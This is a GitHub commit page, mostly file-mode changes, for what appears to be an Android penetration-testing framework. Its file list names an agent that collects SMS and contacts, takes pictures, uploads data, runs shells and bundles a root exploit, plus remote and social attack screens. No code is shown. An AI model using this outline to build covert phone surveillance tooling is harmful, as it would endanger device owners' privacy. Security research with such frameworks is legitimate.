Skip to content
Browse files

added seperate interface for shells. extra character in poller.pl fixed

  • Loading branch information...
1 parent bb3385d commit c582b8350e77b7f3084b474d39157f7715c18ae4 @georgiaw committed Aug 4, 2012
Showing with 444 additions and 21 deletions.
  1. BIN .DS_Store
  2. 0 AndroidAgent/.DS_Store
  3. 0 AndroidAgent/.classpath
  4. 0 AndroidAgent/.project
  5. 0 AndroidAgent/.settings/org.eclipse.jdt.core.prefs
  6. 0 AndroidAgent/AndroidManifest.xml
  7. 0 AndroidAgent/assets/.DS_Store
  8. 0 AndroidAgent/assets/rageagainstthecage
  9. 0 AndroidAgent/bin/AndroidAgent.apk
  10. 0 AndroidAgent/bin/classes.dex
  11. 0 AndroidAgent/bin/classes/.DS_Store
  12. 0 AndroidAgent/bin/classes/com/.DS_Store
  13. 0 AndroidAgent/bin/classes/com/bulbsecurity/.DS_Store
  14. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/.DS_Store
  15. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/AlarmReceiver.class
  16. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/AndroidAgent.class
  17. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/AndroidAgentActivity.class
  18. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Base64$1.class
  19. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Base64$InputStream.class
  20. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Base64$OutputStream.class
  21. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Base64.class
  22. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/CommandHandler.class
  23. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/ContactsGet.class
  24. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/InternetPoll.class
  25. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Phase1$1.class
  26. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Phase1.class
  27. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Phase2$1.class
  28. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Phase2.class
  29. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/PictureService$1.class
  30. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/PictureService.class
  31. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$attr.class
  32. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$drawable.class
  33. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$id.class
  34. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$layout.class
  35. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$raw.class
  36. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$string.class
  37. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R.class
  38. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/SMSGet.class
  39. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/SMSReceiver.class
  40. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/SMSService.class
  41. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/ServiceAutoStarter.class
  42. 0 AndroidAgent/bin/classes/com/bulbsecurity/framework/WebUploadService.class
  43. 0 AndroidAgent/bin/classes/jackpal/androidterm/.svn/all-wcprops
  44. 0 AndroidAgent/bin/classes/jackpal/androidterm/.svn/entries
  45. 0 AndroidAgent/bin/classes/jackpal/androidterm/.svn/text-base/Exec.java.svn-base
  46. 0 AndroidAgent/bin/classes/jackpal/androidterm/Exec.class
  47. 0 AndroidAgent/bin/res/drawable-hdpi/ic_launcher.png
  48. 0 AndroidAgent/bin/res/drawable-ldpi/ic_launcher.png
  49. 0 AndroidAgent/bin/res/drawable-mdpi/ic_launcher.png
  50. 0 AndroidAgent/bin/resources.ap_
  51. 0 AndroidAgent/gen/com/bulbsecurity/framework/R.java
  52. 0 AndroidAgent/jni/.svn/all-wcprops
  53. 0 AndroidAgent/jni/.svn/entries
  54. 0 AndroidAgent/jni/.svn/text-base/Android.mk.svn-base
  55. 0 AndroidAgent/jni/.svn/text-base/termExec.cpp.svn-base
  56. 0 AndroidAgent/jni/Android.mk
  57. 0 AndroidAgent/jni/termExec.cpp
  58. 0 AndroidAgent/libs/armeabi/libandroidterm.so
  59. 0 AndroidAgent/obj/local/armeabi/libandroidterm.so
  60. 0 AndroidAgent/obj/local/armeabi/libstdc++.a
  61. 0 AndroidAgent/obj/local/armeabi/objs/androidterm/termExec.o
  62. 0 AndroidAgent/obj/local/armeabi/objs/androidterm/termExec.o.d
  63. 0 AndroidAgent/proguard.cfg
  64. 0 AndroidAgent/project.properties
  65. 0 AndroidAgent/res/drawable-hdpi/ic_launcher.png
  66. 0 AndroidAgent/res/drawable-ldpi/ic_launcher.png
  67. 0 AndroidAgent/res/drawable-mdpi/ic_launcher.png
  68. 0 AndroidAgent/res/layout/camera_surface.xml
  69. 0 AndroidAgent/res/layout/main.xml
  70. 0 AndroidAgent/res/raw/rageagainstthecage
  71. 0 AndroidAgent/res/values/strings.xml
  72. 0 AndroidAgent/src/.DS_Store
  73. 0 AndroidAgent/src/com/.DS_Store
  74. 0 AndroidAgent/src/com/bulbsecurity/.DS_Store
  75. 0 AndroidAgent/src/com/bulbsecurity/framework/.DS_Store
  76. 0 AndroidAgent/src/com/bulbsecurity/framework/AlarmReceiver.java
  77. 0 AndroidAgent/src/com/bulbsecurity/framework/AndroidAgent.java
  78. 0 AndroidAgent/src/com/bulbsecurity/framework/AndroidAgentActivity.java
  79. 0 AndroidAgent/src/com/bulbsecurity/framework/Base64.java
  80. 0 AndroidAgent/src/com/bulbsecurity/framework/CommandHandler.java
  81. 0 AndroidAgent/src/com/bulbsecurity/framework/ContactsGet.java
  82. 0 AndroidAgent/src/com/bulbsecurity/framework/InternetPoll.java
  83. 0 AndroidAgent/src/com/bulbsecurity/framework/Phase1.java
  84. 0 AndroidAgent/src/com/bulbsecurity/framework/Phase2.java
  85. 0 AndroidAgent/src/com/bulbsecurity/framework/PictureService.java
  86. 0 AndroidAgent/src/com/bulbsecurity/framework/SMSGet.java
  87. 0 AndroidAgent/src/com/bulbsecurity/framework/SMSReceiver.java
  88. 0 AndroidAgent/src/com/bulbsecurity/framework/SMSService.java
  89. 0 AndroidAgent/src/com/bulbsecurity/framework/ServiceAutoStarter.java
  90. 0 AndroidAgent/src/com/bulbsecurity/framework/WebUploadService.java
  91. 0 AndroidAgent/src/jackpal/androidterm/.svn/all-wcprops
  92. 0 AndroidAgent/src/jackpal/androidterm/.svn/entries
  93. 0 AndroidAgent/src/jackpal/androidterm/.svn/text-base/Exec.java.svn-base
  94. 0 AndroidAgent/src/jackpal/androidterm/Exec.java
  95. 0 FrameworkAndroidApp/.DS_Store
  96. 0 FrameworkAndroidApp/.classpath
  97. 0 FrameworkAndroidApp/.project
  98. 0 FrameworkAndroidApp/AndroidManifest.xml
  99. BIN FrameworkAndroidApp/bin/FrameworkAndroidApp.apk
  100. BIN FrameworkAndroidApp/bin/classes.dex
  101. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/Base64$1.class
  102. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/Base64$InputStream.class
  103. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/Base64$OutputStream.class
  104. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/Base64.class
  105. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/CommandHandler.class
  106. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/FrameworkAndroidApp.class
  107. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/FrameworkAndroidAppActivity.class
  108. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/FunctionListActivity.class
  109. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/GetAgentsActivity$1.class
  110. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/GetAgentsActivity$2.class
  111. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/GetAgentsActivity.class
  112. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/GetDataActivity.class
  113. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/InternetPoll.class
  114. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$array.class
  115. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$attr.class
  116. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$drawable.class
  117. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$id.class
  118. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$layout.class
  119. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$string.class
  120. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R.class
  121. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/RemoteAttackActivity.class
  122. BIN FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/SMSReceiver.class
  123. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/SMSService.class
  124. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/SendCommandActivity.class
  125. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/ServiceAutoStarter.class
  126. BIN FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/SocialAttackActivity.class
  127. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/WebUploadService.class
  128. 0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/WebUploadService2.class
  129. 0 FrameworkAndroidApp/bin/res/drawable-hdpi/ic_launcher.png
  130. 0 FrameworkAndroidApp/bin/res/drawable-ldpi/ic_launcher.png
  131. 0 FrameworkAndroidApp/bin/res/drawable-mdpi/ic_launcher.png
  132. BIN FrameworkAndroidApp/bin/resources.ap_
  133. 0 FrameworkAndroidApp/gen/com/bulbsecurity/framework/app/R.java
  134. 0 FrameworkAndroidApp/proguard.cfg
  135. 0 FrameworkAndroidApp/project.properties
  136. 0 FrameworkAndroidApp/res/drawable-hdpi/ic_launcher.png
  137. 0 FrameworkAndroidApp/res/drawable-ldpi/ic_launcher.png
  138. 0 FrameworkAndroidApp/res/drawable-mdpi/ic_launcher.png
  139. 0 FrameworkAndroidApp/res/layout/commands.xml
  140. 0 FrameworkAndroidApp/res/layout/data.xml
  141. 0 FrameworkAndroidApp/res/layout/fuctionlist.xml
  142. 0 FrameworkAndroidApp/res/layout/getagents.xml
  143. 0 FrameworkAndroidApp/res/layout/getdata.xml
  144. 0 FrameworkAndroidApp/res/layout/main.xml
  145. 0 FrameworkAndroidApp/res/layout/remoteattack.xml
  146. 0 FrameworkAndroidApp/res/layout/socialattack.xml
  147. 0 FrameworkAndroidApp/res/values/strings.xml
  148. 0 FrameworkAndroidApp/src/.DS_Store
  149. 0 FrameworkAndroidApp/src/com/.DS_Store
  150. 0 FrameworkAndroidApp/src/com/bulbsecurity/.DS_Store
  151. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/.DS_Store
  152. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/Base64.java
  153. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/CommandHandler.java
  154. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/FrameworkAndroidApp.java
  155. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/FrameworkAndroidAppActivity.java
  156. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/FunctionListActivity.java
  157. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/GetAgentsActivity.java
  158. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/GetDataActivity.java
  159. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/InternetPoll.java
  160. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/RemoteAttackActivity.java
  161. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/SMSReceiver.java
  162. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/SMSService.java
  163. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/SendCommandActivity.java
  164. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/ServiceAutoStarter.java
  165. +3 −1 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/SocialAttackActivity.java
  166. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/WebUploadService.java
  167. 0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/WebUploadService2.java
  168. 0 README.md
  169. +1 −1 frameworkconsole/agentpoll.pl
  170. +5 −3 frameworkconsole/config
  171. +3 −2 frameworkconsole/framework.pl
  172. +17 −2 frameworkconsole/poller.pl
  173. +3 −2 frameworkgui/androidwebkit.pl
  174. +8 −7 frameworkgui/config
  175. +16 −3 frameworkgui/poller.pl
  176. +388 −0 frameworkgui/poller.pl~
  177. 0 license.rtf
View
BIN .DS_Store 100644 → 100755
Binary file not shown.
View
0 AndroidAgent/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/.classpath 100644 → 100755
File mode changed.
View
0 AndroidAgent/.project 100644 → 100755
File mode changed.
View
0 AndroidAgent/.settings/org.eclipse.jdt.core.prefs 100644 → 100755
File mode changed.
View
0 AndroidAgent/AndroidManifest.xml 100644 → 100755
File mode changed.
View
0 AndroidAgent/assets/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/assets/rageagainstthecage 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/AndroidAgent.apk 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes.dex 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/AlarmReceiver.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/AndroidAgent.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/AndroidAgentActivity.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Base64$1.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Base64$InputStream.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Base64$OutputStream.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Base64.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/CommandHandler.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/ContactsGet.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/InternetPoll.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Phase1$1.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Phase1.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Phase2$1.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/Phase2.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/PictureService$1.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/PictureService.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$attr.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$drawable.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$id.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$layout.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$raw.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R$string.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/R.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/SMSGet.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/SMSReceiver.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/SMSService.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/ServiceAutoStarter.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/com/bulbsecurity/framework/WebUploadService.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/jackpal/androidterm/.svn/all-wcprops 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/jackpal/androidterm/.svn/entries 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/jackpal/androidterm/.svn/text-base/Exec.java.svn-base 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/classes/jackpal/androidterm/Exec.class 100644 → 100755
File mode changed.
View
0 AndroidAgent/bin/res/drawable-hdpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 AndroidAgent/bin/res/drawable-ldpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 AndroidAgent/bin/res/drawable-mdpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 AndroidAgent/bin/resources.ap_ 100644 → 100755
File mode changed.
View
0 AndroidAgent/gen/com/bulbsecurity/framework/R.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/jni/.svn/all-wcprops 100644 → 100755
File mode changed.
View
0 AndroidAgent/jni/.svn/entries 100644 → 100755
File mode changed.
View
0 AndroidAgent/jni/.svn/text-base/Android.mk.svn-base 100644 → 100755
File mode changed.
View
0 AndroidAgent/jni/.svn/text-base/termExec.cpp.svn-base 100644 → 100755
File mode changed.
View
0 AndroidAgent/jni/Android.mk 100644 → 100755
File mode changed.
View
0 AndroidAgent/jni/termExec.cpp 100644 → 100755
File mode changed.
View
0 AndroidAgent/libs/armeabi/libandroidterm.so 100644 → 100755
File mode changed.
View
0 AndroidAgent/obj/local/armeabi/libandroidterm.so 100644 → 100755
File mode changed.
View
0 AndroidAgent/obj/local/armeabi/libstdc++.a 100644 → 100755
File mode changed.
View
0 AndroidAgent/obj/local/armeabi/objs/androidterm/termExec.o 100644 → 100755
File mode changed.
View
0 AndroidAgent/obj/local/armeabi/objs/androidterm/termExec.o.d 100644 → 100755
File mode changed.
View
0 AndroidAgent/proguard.cfg 100644 → 100755
File mode changed.
View
0 AndroidAgent/project.properties 100644 → 100755
File mode changed.
View
0 AndroidAgent/res/drawable-hdpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 AndroidAgent/res/drawable-ldpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 AndroidAgent/res/drawable-mdpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 AndroidAgent/res/layout/camera_surface.xml 100644 → 100755
File mode changed.
View
0 AndroidAgent/res/layout/main.xml 100644 → 100755
File mode changed.
View
0 AndroidAgent/res/raw/rageagainstthecage 100644 → 100755
File mode changed.
View
0 AndroidAgent/res/values/strings.xml 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/.DS_Store 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/AlarmReceiver.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/AndroidAgent.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/AndroidAgentActivity.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/Base64.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/CommandHandler.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/ContactsGet.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/InternetPoll.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/Phase1.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/Phase2.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/PictureService.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/SMSGet.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/SMSReceiver.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/SMSService.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/ServiceAutoStarter.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/com/bulbsecurity/framework/WebUploadService.java 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/jackpal/androidterm/.svn/all-wcprops 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/jackpal/androidterm/.svn/entries 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/jackpal/androidterm/.svn/text-base/Exec.java.svn-base 100644 → 100755
File mode changed.
View
0 AndroidAgent/src/jackpal/androidterm/Exec.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/.DS_Store 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/.classpath 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/.project 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/AndroidManifest.xml 100644 → 100755
File mode changed.
View
BIN FrameworkAndroidApp/bin/FrameworkAndroidApp.apk 100644 → 100755
Binary file not shown.
View
BIN FrameworkAndroidApp/bin/classes.dex 100644 → 100755
Binary file not shown.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/Base64$1.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/Base64$InputStream.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/Base64$OutputStream.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/Base64.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/CommandHandler.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/FrameworkAndroidApp.class 100644 → 100755
File mode changed.
View
0 ...rkAndroidApp/bin/classes/com/bulbsecurity/framework/app/FrameworkAndroidAppActivity.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/FunctionListActivity.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/GetAgentsActivity$1.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/GetAgentsActivity$2.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/GetAgentsActivity.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/GetDataActivity.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/InternetPoll.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$array.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$attr.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$drawable.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$id.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$layout.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R$string.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/R.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/RemoteAttackActivity.class 100644 → 100755
File mode changed.
View
BIN FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/SMSReceiver.class 100644 → 100755
Binary file not shown.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/SMSService.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/SendCommandActivity.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/ServiceAutoStarter.class 100644 → 100755
File mode changed.
View
BIN FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/SocialAttackActivity.class 100644 → 100755
Binary file not shown.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/WebUploadService.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/classes/com/bulbsecurity/framework/app/WebUploadService2.class 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/bin/res/drawable-hdpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 FrameworkAndroidApp/bin/res/drawable-ldpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 FrameworkAndroidApp/bin/res/drawable-mdpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
BIN FrameworkAndroidApp/bin/resources.ap_ 100644 → 100755
Binary file not shown.
View
0 FrameworkAndroidApp/gen/com/bulbsecurity/framework/app/R.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/proguard.cfg 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/project.properties 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/res/drawable-hdpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 FrameworkAndroidApp/res/drawable-ldpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 FrameworkAndroidApp/res/drawable-mdpi/ic_launcher.png 100644 → 100755
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View
0 FrameworkAndroidApp/res/layout/commands.xml 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/res/layout/data.xml 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/res/layout/fuctionlist.xml 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/res/layout/getagents.xml 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/res/layout/getdata.xml 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/res/layout/main.xml 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/res/layout/remoteattack.xml 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/res/layout/socialattack.xml 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/res/values/strings.xml 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/.DS_Store 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/.DS_Store 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/.DS_Store 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/.DS_Store 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/Base64.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/CommandHandler.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/FrameworkAndroidApp.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/FrameworkAndroidAppActivity.java 100644 → 100755
File mode changed.
View
